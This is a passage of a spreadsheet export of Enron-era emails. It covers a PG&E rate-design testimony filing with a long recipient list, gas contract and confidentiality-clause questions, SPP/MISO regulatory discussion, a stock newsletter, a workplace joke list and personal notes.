&gt; 'hodgesjl@pacbell.net'; 'honest@compuserve.com'; 'howens@seniors.org';_x000D_
&gt; 'huse@eesconsulting.com'; 'imoosen@gralegal.com'; Migocki, Joe;_x000D_
&gt; 'jbarthrop@powersavers.com'; 'jbennett@gmssr.com'; 'jbradley@svmg.org';_x000D_
&gt; 'jbushee@sablaw.com'; 'jcpaine@stoel.com'; 'jdh@eslawfirm.com';_x000D_
&gt; 'jeff@hmhresources.com'; 'jerryl@abag.ca.gov'; 'jguzman@nossaman.com';_x000D_
&gt; 'jherrera@dpw.co.la.ca.us'; 'jjz@cpuc.ca.gov'; 'jleslie@luce.com';_x000D_
&gt; 'jlo@cpuc.ca.gov'; 'jlondon@gralegal.com'; 'jlyoung@sempra.com';_x000D_
&gt; 'jmalkin@orrick.com'; 'jmh@cpuc.ca.gov'; 'jnnc@chevron.com';_x000D_
&gt; 'joe.paul@dynegy.com'; 'jogg@jhenergy.com'; 'jon.jacobs@paconsulting.com';_x000D_
&gt; 'joseh@lif.org'; 'jparrott@sempra.com'; 'jptang@oaklandcityattorney.org';_x000D_
&gt; 'jrd@cpuc.ca.gov'; 'jsilva@edisonenterprises.com';_x000D_
&gt; 'jsmollon@newwestenergy.com'; 'jsqueri@gmssr.com'; 'jsw@cpuc.ca.gov';_x000D_
&gt; 'jtachera@energy.state.ca.us'; 'julesan@aol.com'; 'jweil@aglet.org';_x000D_
&gt; 'jweisgall@aol.com'; Frazier-hampton, Janice; 'jyoung@ebmud.com';_x000D_
&gt; 'karen@klindh.com'; 'keith-sappenfield@reliantenergy.com';_x000D_
&gt; 'kim@cpuc.ca.gov'; 'kmccrea@sablaw.com'; 'kmcspadd@milbank.com';_x000D_
&gt; 'kmelville@sempra.com'; 'kmills@cfbf.com'; 'kok@cpuc.ca.gov';_x000D_
&gt; 'kpoole@adamsbroadwell.com'; 'ktilton@gralegal.com'; 'lgurick@calpx.com';_x000D_
&gt; 'lindseyhowdowning@dwt.com'; 'ljhubbard@sempra.com';_x000D_
&gt; 'LKristov@energy.state.ca.us'; 'llk@cpuc.ca.gov'; 'lmh@eslawfirm.com';_x000D_
&gt; 'lss@cpuc.ca.gov'; 'luluw@newsdata.com'; 'LVanWagenen@sempra.com';_x000D_
&gt; 'mbrubaker@consultbai.com'; 'mday@gmssr.com';_x000D_
&gt; 'mdjoseph@adamsbroadwell.com'; 'melanie_gillette@rmiinc.com';_x000D_
&gt; 'mer@cpuc.ca.gov'; 'mgomez1@bart.gov'; 'mhg@hetrading.com';_x000D_
&gt; 'mmattes@nossaman.com'; 'mpa@a-klaw.com'; 'mpatel@brownwoodlaw.com';_x000D_
&gt; 'mschwebs@energy.state.ca.us'; 'mshames@ucan.org';_x000D_
&gt; 'musicamaria@yahoo.com'; 'mv1@cpuc.ca.gov'; 'napedersen@jonesday.com';_x000D_
&gt; 'natutt@duanemorris.com'; 'nevillm@hdcdojnet.state.ca.us';_x000D_
&gt; 'nryan@environmentaldefense.org'; Kjellund, Niels; 'oshirock@pacbell.net';_x000D_
&gt; 'pat.williams@dhcmail.com'; 'patrickm@crossborderenergy.com';_x000D_
&gt; 'paul.harris@bridge.com'; 'pbray@newpower.com';_x000D_
&gt; 'peter_fox-penner@brattle.com'; 'phanschen@mofo.com'; 'picketse@sce.com';_x000D_
&gt; 'pjmuller@ricochet.net'; 'pjpowerlaw@aol.com'; 'pmcdonne@wenet.net';_x000D_
&gt; 'pmd@cpuc.ca.gov'; Ouborg, Peter (Law); 'randy.chinn@senate.ca.gov';_x000D_
&gt; 'randy_britt@mayco.com'; 'raw@cpuc.ca.gov'; 'rax@cpuc.ca.gov';_x000D_
&gt; 'rbw@mrwassoc.com'; 'rcosta@turn.org'; 'rcsstl@cdmnet.com';_x000D_
&gt; 'riald@kindermorgan.com'; 'rick.counihan@greenmountain.com'; Peters, Roger_x000D_
&gt; (Law); 'rkeen@manatt.com'; 'rliebert@cfbf.com'; 'rmccann@cal.net';_x000D_
&gt; 'robert.d.schasel@fritolay.com'; 'rogerberliner@bcjlaw.com';_x000D_
&gt; 'ronknecht@aol.com'; 'rpernell@energy.state.ca.us'; 'rrcollins@n-h-i.org';_x000D_
&gt; Helgens, Ronald; 'rschmidt@bartlewells.com';_x000D_
&gt; 'rtavares@energy.state.ca.us'; 'rtf@cpuc.ca.gov';_x000D_
&gt; 'sberlin@mccarthylaw.com'; 'scottst@mid.org'; 'sfc@cpuc.ca.gov';_x000D_
&gt; 'sgreenberg@realenergy.com'; 'Slayman@energy.state.ca.us';_x000D_
&gt; 'smoss@hooked.net'; 'smutny@iepa.com'; 'ssmyers@worldnet.att.net';_x000D_
&gt; 'swchurchill@juno.com'; 'thaines@smud.org'; 'theresa_mueller@ci.sf.ca.us';_x000D_
&gt; 'thoulihan@mdbe.com'; 'tknox@klalawfirm.com';_x000D_
&gt; 'tmberliner@duanemorris.com'; 'tom.oneill@abnamro.com';_x000D_
&gt; 'tomb@crossborderenergy.com'; 'tsmegal@calwater.com';_x000D_
&gt; 'twetzel@thermoecotek.com'; 'txb@cpuc.ca.gov';_x000D_
&gt; 'uwuaregion5@earthlink.net'; 'wbooth@booth-law.com';_x000D_
&gt; 'wendy@econinsights.com'; Edwards, William (Law); 'ztc@cpuc.ca.gov'_x000D_
&gt; Subject: A.00-11-056 PG&amp;E's Testimony_x000D_
&gt;_x000D_
&gt; Re:  A.00-11-056 RSP-Rate Design_x000D_
&gt;_x000D_
&gt; Attached hereto please find an electronic copy of:_x000D_
&gt; 1) PG&amp;E's Rate Stabilization Plan Rate Design Phase Testimony and_x000D_
&gt; 2) PG&amp;E's Testimony In Response to April 11, 2001 ACR._x000D_
&gt;_x000D_
&gt; Hard copies of these documents were mailed to all parties on CPUC Service_x000D_
&gt; Lists A. 00-11-038; A. 00-11-056 and A. 00-10-028._x000D_
&gt;_x000D_
&gt; Please email a copy of any documents you serve in this matter to Andrew L._x000D_
&gt; Niven at aln2@pge.com and to Gail Slocum at glsg@pge.com._x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Rate Design Proposal Testimony_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;  &lt;&lt;RSP_Rate Design_Cover.doc&gt;&gt;  &lt;&lt;RSP_Rate Design_MTOC.doc&gt;&gt;  &lt;&lt;RSP_Rate_x000D_
&gt; Design_Ch01.doc&gt;&gt;  &lt;&lt;RSP_Rate Design_Ch02.doc&gt;&gt;  &lt;&lt;SofQ_CoyneKB.doc&gt;&gt;_x000D_
&gt; &lt;&lt;RSP_Rate Design_Ch01.doc&gt;&gt;  &lt;&lt;RSP-PGE-Attachment1.xls&gt;&gt;_x000D_
&gt; &lt;&lt;RSP-PGE-Attachment2.XLS&gt;&gt;  &lt;&lt;RSP-PGE-Attachment3-Back.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt; PG&amp;E's Testimony In Response to April 11, 2001 ACR_x000D_
&gt;_x000D_
&gt;  &lt;&lt;RSP_Billing-Metering_Cover.doc&gt;&gt;  &lt;&lt;RSP_Billing-Metering_MTOC.doc&gt;&gt;_x000D_
&gt; &lt;&lt;RSP_Billing-Metering_Ch01.doc&gt;&gt;_x000D_
&gt; &lt;&lt;RSP_Billing-Metering_Ch01_Attachment.doc&gt;&gt;_x000D_
&gt; &lt;&lt;RSP_Billing-Metering_Ch02.doc&gt;&gt;  &lt;&lt;RSP_Billing-Metering_Ch03.doc&gt;&gt;_x000D_
&gt; &lt;&lt;SofQ_SmithTH.doc&gt;&gt;  &lt;&lt;SofQ_WarnockJF.doc&gt;&gt;_x000D_
&gt;_x000D_
&gt; Roxanne Piccillo_x000D_
&gt; PG&amp;E Case Coordinator_x000D_
&gt; rtp1@pge.com_x000D_
&gt; (415) 973-6593_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
 - BaselineRSPrev3.xls_x000D_
 - RSP-PGE-RA.xls_x000D_
 - RSP-PGE-RD-nonres1.XLS_x000D_
 - RSP-PGE-RD-res1.XLS_x000D_
 - RSP_Rate Design_Cover.doc_x000D_
 - RSP_Rate Design_MTOC.doc_x000D_
 - RSP_Rate Design_Ch01.doc_x000D_
 - RSP_Rate Design_Ch02.doc_x000D_
 - SofQ_CoyneKB.doc_x000D_
 - RSP_Rate Design_Ch01.doc_x000D_
 - RSP-PGE-Attachment1.xls_x000D_
 - RSP-PGE-Attachment2.XLS_x000D_
 - RSP-PGE-Attachment3-Back.doc_x000D_
 - RSP_Billing-Metering_Cover.doc_x000D_
 - RSP_Billing-Metering_MTOC.doc_x000D_
 - RSP_Billing-Metering_Ch01.doc_x000D_
 - RSP_Billing-Metering_Ch01_Attachment.doc_x000D_
 - RSP_Billing-Metering_Ch02.doc_x000D_
 - RSP_Billing-Metering_Ch03.doc_x000D_
 - SofQ_SmithTH.doc_x000D_
 - SofQ_WarnockJF.doc</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 14:23:58 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sherry.noack@elpaso.com'})</t>
  </si>
  <si>
    <t>Tenn contract 29667</t>
  </si>
  <si>
    <t>I know you told me that this capacity could be released.  Can it be released in 4 seperate peices?  Plus I may be doing permanent releases too.  Any problem with that?  Does this contract have an evergreen clause?</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 00:51:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'tracy.ngo@enron.com', 'katie_pratt@meierandfrank.com', 'jeffrey.oh@enron.com', 'kate.symes@enron.com'})</t>
  </si>
  <si>
    <t>Things You Would Like to Say at Work..</t>
  </si>
  <si>
    <t xml:space="preserve">This is an alternate version of the list we saw last week.  NOTE #6!!_x000D_
_x000D_
TA_x000D_
_x000D_
_x000D_
_x000D_
THINGS YOU'D LOVE TO SAY AT WORK, BUT CAN'T_x000D_
_x000D_
1. I can see your point, but I still think you're full of shit._x000D_
2. I don't know what your problem is, but I'll bet it's hard to pronounce._x000D_
3. How about never? Is never good for you?_x000D_
4. I see you've set aside this special time to humiliate yourself in public._x000D_
5. I'm really easy to get along with once you people learn to see it my way._x000D_
6. I'll try being nicer if you'll try being smarter._x000D_
7. I'm out of my mind, but feel free to leave a message.._x000D_
8. I don't work here. I'm a consultant._x000D_
9. It sounds like English, but I can't understand a word you're saying._x000D_
10. Ahhh...I see the screw-up fairy has visited us again..._x000D_
11. I like you. You remind me of when I was young and stupid._x000D_
12. You are validating my inherent mistrust of strangers._x000D_
13. I have plenty of talent and vision. I just don't give a damn._x000D_
14. I'm already visualizing the duct tape over your mouth._x000D_
15. I will always cherish the initial misconceptions I had about you._x000D_
16. Thank you. We're all refreshed and challenged by your unique point of _x000D_
view._x000D_
17. The fact that no one understands you doesn't mean you're an artist._x000D_
18. Any connection between your reality and mine is purely coincidental._x000D_
19. What am I? Flypaper for freaks!?_x000D_
20. I'm not being rude. You're just insignificant._x000D_
21. It's a thankless job, but I've got a lot of Karma to burn off._x000D_
22. Yes, I am an agent of Satan, but my duties are largely ceremonial._x000D_
23. And your crybaby whiny-butt opinion would be...?_x000D_
24. Do I look like a people person?_x000D_
25. This isn't an office. It's Hell with fluorescent lighting._x000D_
26. I started out with nothing &amp; still have most of it left._x000D_
27. Sarcasm is just one more service we offer._x000D_
28. If I throw a stick, will you leave?_x000D_
29. Errors have been made. Others will be blamed._x000D_
30. Whatever kind of look you were going for, you missed._x000D_
31. I'm trying to imagine you with a personality._x000D_
32. A cubicle is just a padded cell without a door._x000D_
33. Can I trade this job for what's behind door #1?_x000D_
34. Too many freaks, not enough circuses._x000D_
35. Nice perfume. Must you marinate in it?_x000D_
36. Chaos, panic, &amp; disorder - my work here is done._x000D_
37. How do I set a laser printer to stun?_x000D_
38. I thought I wanted a career, turns out I just wanted pay checks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 21:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Please respond to Sivy on Stocks SIVY ON STOCKS from money.com_x000D_
April 20, 2001_x000D_
_x000D_
Bigger is better_x000D_
_x000D_
Tech stocks are coming back, and giants that dominate important markets are_x000D_
likely to lead the advance. At the forefront of that group is Microsoft, as_x000D_
the company's latest earnings report shows._x000D_
_x000D_
By Michael Sivy_x000D_
_x000D_
"It may be that the race is not always to the swift, nor the battle to the_x000D_
strong -- but that is the way to bet," said Damon Runyon, whose short_x000D_
stories about the hustlers of New York City's theater district served as_x000D_
the basis for the musical "Guys and Dolls." Runyon's street-smart_x000D_
observation is good advice for today's stock market. It may be that almost_x000D_
all computer and telecommunications stocks were hurt in the Tech Wreck of_x000D_
the past year. But not all of them will rebound equally as the economy_x000D_
improves. Some dot-coms are gone for good. And many small tech stocks have_x000D_
permanently lost market share. But the biggest tech companies, which_x000D_
dominate important industry sectors, are likely to lead a powerful advance._x000D_
_x000D_
The next six months will be tough for technology companies, with excess_x000D_
inventories and infrastructure overcapacity afflicting industries such as_x000D_
semiconductors and telecom. But the longer term outlook argues powerfully_x000D_
for a rebound. Over most of the past century, stocks have gained_x000D_
substantially -- as much as 65 percent -- in the 18 months following four_x000D_
straight interest rate cuts by the Federal Reserve. And as soon as_x000D_
investors are convinced that the worst is past and that the outlook for the_x000D_
next few years will be increasingly positive, they'll begin moving money_x000D_
into the most solid tech choices._x000D_
_x000D_
That's essentially what has been happening with Microsoft [MSFT]. The share_x000D_
price dropped to less than $41 in December. But since the Fed began cutting_x000D_
rates in January, the stock has climbed a whopping 70 percent to nearly $69_x000D_
a share. And on Thursday, Microsoft's rebound was reinforced by a_x000D_
surprisingly good first-quarter report. It wasn't that earnings were so_x000D_
high -- they were only a couple of cents a share above expectations. But_x000D_
both analysts and investors were impressed by how well Microsoft's_x000D_
businesses are holding up._x000D_
_x000D_
In the first quarter, Microsoft's revenues climbed 14 percent from_x000D_
year-earlier levels. Sales were particularly solid for upgrades of the_x000D_
Windows operating systems used by corporations and for server software. And_x000D_
though the company indicated that earnings growth for the next couple of_x000D_
quarters would be flattish, the revenue outlook remains quite positive. For_x000D_
next fiscal year, which begins in July, earnings are projected to improve_x000D_
by a bit less than 10 percent._x000D_
_x000D_
That near-term growth alone can justify Microsoft's 35 P/E, based projected_x000D_
earnings for next year. But investors aren't looking at current profits._x000D_
They want to know whether the franchise is strong -- and whether it's_x000D_
getting stronger. The answer to both questions is yes. And since Microsoft_x000D_
is a massive cash generator -- with $30 billion in liquid assets -- it_x000D_
shouldn't ever have to worry about financial problems._x000D_
_x000D_
Microsoft provides such a broad range of software products that it can_x000D_
thrive even if sales of personal computers remain low. Further, the_x000D_
company's large established base of users means that upgrades can boost_x000D_
revenues even when sales of new software products are unimpressive. Most_x000D_
important of all, by the end of the year Microsoft will have upgraded most_x000D_
of its important products. That means that the world's software giant_x000D_
figures to be at the forefront of the next market advance once the current_x000D_
bear market is clearly over and the economy is in an upswing again._x000D_
_x000D_
###_x000D_
_x000D_
Post your comments on Michael's column at:_x000D_
http://www.money.com/depts/investing/sivy/index.html_x000D_
_x000D_
To subscribe or unsubscribe to Sivy on Stocks, go to:_x000D_
http://www.money.com/email/_x000D_
_x000D_
-----------------------------------------------------------_x000D_
MARKETPLACE_x000D_
-----------------------------------------------------------_x000D_
CONTACT THE BIGGEST COMPANIES IN THE WORLD!_x000D_
Over 5,000 contact names in the OFFICIAL FORTUNE Databases._x000D_
DOWNLOAD THEM NOW!_x000D_
http://www.fortune.com/datastore/?mn1_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
Special Internet Offer!!!_x000D_
_x000D_
Sign up for a RISK-FREE issue of MONEY MAGAZINE at_x000D_
http://www.money.com/subscribe2_x000D_
_x000D_
Or if you prefer call our toll-free number 1-800-544-4594_x000D_
_x000D_
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *_x000D_
_x000D_
We may, from time to time, contact you with offers for Time Inc._x000D_
products and services which we think may be of interest to you._x000D_
If you would prefer us not to contact you in this manner, AND_x000D_
YOU DID NOT INDICATE THIS PREFERENCE AT THE TIME YOU SIGNED UP_x000D_
for the Sivy on Stocks online newsletter or any other Time Inc._x000D_
online newsletters, please let us know by sending us an e-mail_x000D_
at &lt;no_solicit@money.com&gt;._x000D_
_x000D_
Additionally, from time to time we may provide your e-mail_x000D_
address to carefully chosen companies whose offers we think may_x000D_
be of interest to you.  If you would prefer us not use your_x000D_
e-mail address in this manner, AND YOU DID NOT INDICATE_x000D_
THIS PREFERENCE AT THE TIME YOU SIGNED UP for the Sivy on Stocks online_x000D_
newsletter or any other Time Inc. online newsletter, please let_x000D_
us know by e-mailing us at &lt;no_transfer@money.com&gt;.</t>
  </si>
  <si>
    <t>Tue, 22 Jan 2002 10:02:13 -0800 (PST)</t>
  </si>
  <si>
    <t>I miss you</t>
  </si>
  <si>
    <t>Hi Dearie,_x000D_
_x000D_
How are you?  I have been hearing your name more lately, and just wanted to touch base and tell you how much I miss you!  I have been buying that good Prosperity wine at Trader Joe's and always remember the party at your house._x000D_
_x000D_
Do you think that you will be ever coming here to visit?  How is your husband?  How is your dog-bite scar? Do you have any new Jewelry?  I am trying to sell my wedding ring, and am thinking instead that I will just get another stone to match the center stone and make earrings._x000D_
_x000D_
If you do come to stay, please stay with me. I am signing papers on my new condo this afteroon It is wonderful. 3 Bedrooms, backs right up to a greenbelt with a wetland._x000D_
_x000D_
I miss you,_x000D_
_x000D_
Cara Poo</t>
  </si>
  <si>
    <t>Mon, 7 Aug 2000 07:36:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: New EnronOnline</t>
  </si>
  <si>
    <t>Thanks for including me. Sorry I was unable to attend._x000D_
m</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 09:41:59 -0800 (PST)</t>
  </si>
  <si>
    <t>why would i want it if it's crap?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 11:42 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
ill bring you mine_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 11:40 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
no.  they told us yesterday was the last day and that only the eol traders would be getting lunch.  i tell you that we are peons down here.  not a big wig like yourself._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 11:39 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
actually i hate it, are you guys still getting lunch up here_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 11:38 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
i take it that you don't like it?  _x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 11:37 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
some crap from pappadeaux_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 11:37 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	RE: _x000D_
_x000D_
oh ya probably.  i will continue to freak out myself.  :)  what are you eating piglet?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maggi, Mike  _x000D_
Sent:	Tuesday, November 20, 2001 11:36 AM_x000D_
To:	Nelson, Michelle_x000D_
Subject:	RE: _x000D_
_x000D_
sorry i went to get lunch, i think people are freaking out because of ken lays email this morning_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Michelle  _x000D_
Sent:	Tuesday, November 20, 2001 11:34 AM_x000D_
To:	Maggi, Mike_x000D_
Subject:	_x000D_
_x000D_
why are you ignoring me?</t>
  </si>
  <si>
    <t>Wed, 20 Sep 2000 02:16:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Kay,  you bring up an excellent point.  We have addressed this issue in at _x000D_
least two of the form contracts that I am familiar with; however, I believe _x000D_
only recently. See Section 7.5 of our Dedicated Reserves Form Contract  _x000D_
provides: _x000D_
_x000D_
".......Buyer shall not disclose ......to any third party(other than the _x000D_
Party's and its affiliates' employees, lenders, counsel, accountants or _x000D_
prospective purchasers of any contract rights, general intangibles or _x000D_
accounts hereunder,[ it does not say this in our current form, however I _x000D_
would suggest considering  adding here "whether in an asset sale , financing _x000D_
or equity transaction"] in each case who have agreed to keep such terms _x000D_
confidential")..................._x000D_
_x000D_
Sec tion 8.8 of the Enfolio Master Purchase / Sale (natural Gas) form _x000D_
contract contains a similar provision._x000D_
_x000D_
_x000D_
_x000D_
	Kay Mann@ENRON_x000D_
	09/19/2000 12:04 PM_x000D_
		 _x000D_
		 To: Sheila Tweed/HOU/ECT@ECT, Julia Murray/HOU/ECT@ECT, Barbara N _x000D_
Gray/HOU/ECT@ECT, Barton Clark/HOU/ECT@ECT, Bob Carter/HOU/ECT@ECT, Stuart _x000D_
Zisman/HOU/ECT@ECT, Lisa Mellencamp/HOU/ECT@ECT, Ed B Hearn III/HOU/ECT@ECT, _x000D_
Matt Maxwell/Corp/Enron@ENRON, Peggy Banczak/HOU/ECT@ECT_x000D_
		 cc: _x000D_
		 Subject: Confidentiality provisions in various forms_x000D_
_x000D_
_x000D_
I think all of us who deal with assets are running across confidentiality _x000D_
hurdles in all kinds of agreements, including confidentiality agreements.  In _x000D_
short, our business people need the ability to disclose agreements to _x000D_
potential purchasers of projects, contracts and assets, and not all of our _x000D_
forms allow this._x000D_
_x000D_
I'm trying to include an exception for "potential lenders and investors" _x000D_
whenever I can (instead of just lenders). Does someone have a more artful or _x000D_
effective solution?  _x000D_
_x000D_
Just wanted to share the thought so that more eyes could be watching for the _x000D_
issue._x000D_
_x000D_
Kay_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 14:58:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'l..nicolay@enron.com', 'd..steffes@enron.com'})</t>
  </si>
  <si>
    <t>RE: Texas Comission supports prompt implementation of SPP</t>
  </si>
  <si>
    <t xml:space="preserve">It makes a lot of sense_x000D_
_x000D_
LM_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nicolay, Christi L.  _x000D_
Sent:	Wednesday, October 24, 2001 4:55 PM_x000D_
To:	Maurer, Luiz; Steffes, James D._x000D_
Cc:	Ryall, Jean; Roan, Michael_x000D_
Subject:	RE: Texas Comission supports prompt implementation of SPP_x000D_
_x000D_
SPP is joining MISO and today MISO said that the merger should be filed at FERC 1Q02.  MISO also told FERC that the same congestion management systems would be used in SPP/MISO, so no seams.  Since MISO is moving toward the market design we want, then really it seems that SPP should be implementing the MISO system for Day1 (which may well be up 12/15/01) and should be right in line with MISO on Day 2 issues (that we like)._x000D_
_x000D_
However, FERC should not approve SPP as an RTO until it is in with MISO.  I don't see that FERC needs to approve SPP as an RTO in order to allow SPP to finish work on a wholesale energy system because presumably SPP will be using MISO's system.  This summer FERC told SPP to not spend more $ since it was not an RTO yet and it was going off on its own merry way.  Therefore, FERC could say "use MISO's system and specify exactly the minimum that needs to be done on systems in order to have the TX retail settlements done.  This should be done consistent with the no seams, as represented by MISO."  That should satisfy Texas PUC concerns._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maurer, Luiz  _x000D_
Sent:	Wednesday, October 24, 2001 4:39 PM_x000D_
To:	Steffes, James D._x000D_
Cc:	Nicolay, Christi L.; Ryall, Jean_x000D_
Subject:	RE: Texas Comission supports prompt implementation of SPP_x000D_
_x000D_
Jim_x000D_
_x000D_
My feeling is that FERC is not going to change its RTO plans because of this possible interference from the Texas PUC_x000D_
_x000D_
A possible scenario is SPP to ask permission to continue the implemantation of a new settlement and congestion management system. A good point for internal discussion is: To what extent  we want to oppose to those changes ? (which seem to be aligned to our recommendations, but those may imply additional SPP resources)_x000D_
_x000D_
Christi - What do you think?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Steffes, James D.  _x000D_
Sent:	Wednesday, October 24, 2001 4:04 PM_x000D_
To:	Maurer, Luiz; Nicolay, Christi L.; Ryall, Jean_x000D_
Subject:	RE: Texas Comission supports prompt implementation of SPP_x000D_
_x000D_
Luiz -_x000D_
_x000D_
I would like to schedule a phone call with Nick and the PUCT staff to understand the implication of this...  Maybe he isn't asking for too much, but let's get some clarity before we say anything at FERC._x000D_
_x000D_
Can you please set something up with you, Christi, Jean and me for Friday pm and then we'll go outside next week??_x000D_
_x000D_
Jim_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Maurer, Luiz  _x000D_
Sent:	Wednesday, October 24, 2001 2:00 PM_x000D_
To:	Steffes, James D._x000D_
Subject:	Texas Comission supports prompt implementation of SPP_x000D_
_x000D_
_x000D_
Jim_x000D_
_x000D_
You were right. SPP is going to use this episode as a lever to be "promoted" to an RTO. _x000D_
_x000D_
Texas is recommending three steps to introduce competition at Texas-SPP. One is described as follows:_x000D_
_x000D_
_x000D_
*	Support the SPP's efforts to begin wholesale market operations: Mr. Brown, Vice President of SPP, testified that SPP can begin wholesale market operations and complete systems testing by April 1, 2002. He has requested that the SPP Board approve his recommendation to start to wholesale market operations. This Commission should support that process by:_x000D_
_x000D_
-	Requesting in writing that the SPP Board begin wholesale operations as soon as possible with a target date of completing systems testing by April 1, 2002._x000D_
-	Advising FERC of the need to support SPP wholesale market operations. While Mr. Brown testified that the recent July and September Federal Energy Regulatory Commission (FERC) orders regarding SPP's start up expenditures will not impede SPP from implementing wholesale market operations, this Commission should advise FERC that the findings from our hearing show the need for FERC to fully support SPP wholesale operations startup. </t>
  </si>
  <si>
    <t>Fri, 13 Apr 2001 06:15:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ktycholiz@houston.rr.com'})</t>
  </si>
  <si>
    <t>Docs</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the amendment letter, the Spread Value Calc. doc, and the _x000D_
indemnity letter for Patina._x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Jan 2001 09:29:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'vic.gatto@owen2002.vanderbilt.edu'})</t>
  </si>
  <si>
    <t>a very current question</t>
  </si>
  <si>
    <t>Harry,_x000D_
_x000D_
I enjoyed our interview today and hope to continue discussions with Enron_x000D_
about a summer internship._x000D_
_x000D_
I couldn't resist sending you this link.  I don't know if you recall, but_x000D_
during our talk we conducted an exercise attempting to determine new uses_x000D_
for tissue.  I was surprised to learn that Kimberly-Clark has just announced_x000D_
a new product.  They actually were holding a analyst conference call this_x000D_
morning to discuss earnings and their new venture.  Your questions are_x000D_
certainly very current!  I wish I had been creative enough to think of this_x000D_
product during our interview._x000D_
_x000D_
Here is the link._x000D_
http://www.prnewswire.com/cgi-bin/micro_stories.pl?ACCT=118088&amp;TICK=KMB&amp;STOR_x000D_
Y=/www/story/01-16-2001/0001404319&amp;EDATE=Jan+16,+2001_x000D_
&lt;http://www.prnewswire.com/cgi-bin/micro_stories.pl?ACCT=118088&amp;TICK=KMB&amp;STO_x000D_
RY=/www/story/01-16-2001/0001404319&amp;EDATE=Jan+16,+2001&gt;_x000D_
_x000D_
Again, thank you for taking the time to interview me.  I am excited about_x000D_
the opportunities at Enron and look forward to continuing our discussions in_x000D_
the next few weeks._x000D_
_x000D_
Sincerely,_x000D_
_x000D_
Vic_x000D_
_x000D_
Vic Gatto_x000D_
Owen Graduate School of Management_x000D_
Vanderbilt Universtiy_x000D_
(615) 292-7414_x000D_
vic.gatto@owen2002.vanderbilt.edu</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 07:13:49 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'asheers@bear.com'})</t>
  </si>
  <si>
    <t>Joint Energy Development Investments II Limited Partnership ("JEDI_x000D_
 II")</t>
  </si>
  <si>
    <t>Alex:_x000D_
_x000D_
The JEDI II account was opened to liquidate a position in Cypress Energy (around September, 2000)._x000D_
_x000D_
Please let me know if you need further information.  Thanks.  Sara_x000D_
_x000D_
Sara Shackleton_x000D_
Enron Wholesale Services_x000D_
1400 Smith Street, EB3801a_x000D_
Houston, TX  77002_x000D_
Ph:  (713) 853-5620_x000D_
Fax: (713) 646-3490</t>
  </si>
  <si>
    <t>Tue, 29 Jan 2002 10:02:06 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'reefrashman@houston.rr.com'})</t>
  </si>
  <si>
    <t>How are you?</t>
  </si>
  <si>
    <t>I miss you and am wonderin how you are faring in the working world.   I have been checking in on the Riley photo site, she just gets more beautiful every day. _x000D_
_x000D_
Dave and I have signed papers and are final, now I am just waiting for the house to sell.  I have already found another place to live, and have an offer on it based on the sale of my house._x000D_
_x000D_
I love you and hope to hear from you soon._x000D_
_x000D_
Cara</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 01:45:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jeffw@calpine.com'})</t>
  </si>
  <si>
    <t>FW: Astros Opening Day Entry</t>
  </si>
  <si>
    <t xml:space="preserve">fyi......see you there...._x000D_
_x000D_
Jeff Woodall_x000D_
Lead Scheduler, Corporate Risk Management_x000D_
700 Louisiana, Suite 2700_x000D_
Houston, TX 77002_x000D_
(713)830-8781_x000D_
jeffw@calpine.com_x000D_
_x000D_
_x000D_
&gt;  -----Original Message-----_x000D_
&gt; From:  Tricia Monroe_x000D_
&gt; Sent: Monday, April 02, 2001 10:34 AM_x000D_
